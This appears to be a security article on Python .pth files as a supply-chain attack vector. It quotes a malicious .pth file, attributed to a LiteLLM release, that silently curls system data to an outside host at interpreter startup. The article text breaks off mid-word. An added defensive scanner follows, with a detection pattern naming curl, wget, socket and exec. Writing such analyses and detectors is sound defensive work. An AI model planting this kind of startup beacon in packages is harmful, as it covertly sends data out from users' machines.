How .pth Files Became a Supply Chain Weapon (and How to Detect Them)


The Attack That Started It

On March 24, 2026, LiteLLM 1.82.7 was published to PyPI. It contained a file called litellm_init.pth:

    import subprocess, sys
    subprocess.Popen(
        ['curl', '-s', 'https://models.litellm.cloud/beacon', '-d', sys.version],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL
    )

This wasn't in the main code. It was in a .pth file.

What Are .pth Files?

Python's .pth (path) files live in site-packages/ and execute every time you start Pyth
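An added example (not from the original article or from LiteLLM): a small scanner that lists every line in a site directory's .pth files that the interpreter would execute at startup, meaning lines that begin with `import` followed by a space or tab. The `SUSPICIOUS` token list and the function names are assumptions chosen for illustration.

```python
import re
import site
import sysconfig
from pathlib import Path

# Tokens worth a closer look on an executable .pth line.
# Assumption: illustrative list, not an exhaustive signature set.
SUSPICIOUS = re.compile(
    r"\b(subprocess|os\.system|socket|urllib|requests|base64|exec|eval|compile|curl|wget)\b"
)

def executable_lines(text):
    """Return (lineno, line) for every line site.py would exec()."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        # site.py executes only lines starting with "import" + space or tab;
        # anything else is a comment, a blank line or a path entry.
        if line.startswith(("import ", "import\t")):
            hits.append((lineno, line.rstrip()))
    return hits

def scan_dir(directory):
    """Scan one site directory and return one finding per executable line."""
    findings = []
    for pth in sorted(Path(directory).glob("*.pth")):
        text = pth.read_text(encoding="utf-8", errors="replace")
        for lineno, line in executable_lines(text):
            findings.append({
                "file": pth.name,
                "line": lineno,
                "code": line,
                "suspicious": sorted(set(SUSPICIOUS.findall(line))),
            })
    return findings

def site_dirs():
    """Directories the running interpreter scans for .pth files."""
    paths = sysconfig.get_paths()
    dirs = {paths["purelib"], paths["platlib"], site.getusersitepackages()}
    dirs.update(site.getsitepackages())
    return sorted(d for d in dirs if Path(d).is_dir())

if __name__ == "__main__":
    for d in site_dirs():
        for f in scan_dir(d):
            flag = "SUSPICIOUS" if f["suspicious"] else "review"
            print(f"[{flag}] {d}/{f['file']}:{f['line']}: {f['code'][:120]}")
```

Some legitimate packages ship .pth files with import lines, so treat unflagged hits as items to check against the owning package rather than as confirmed compromise.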
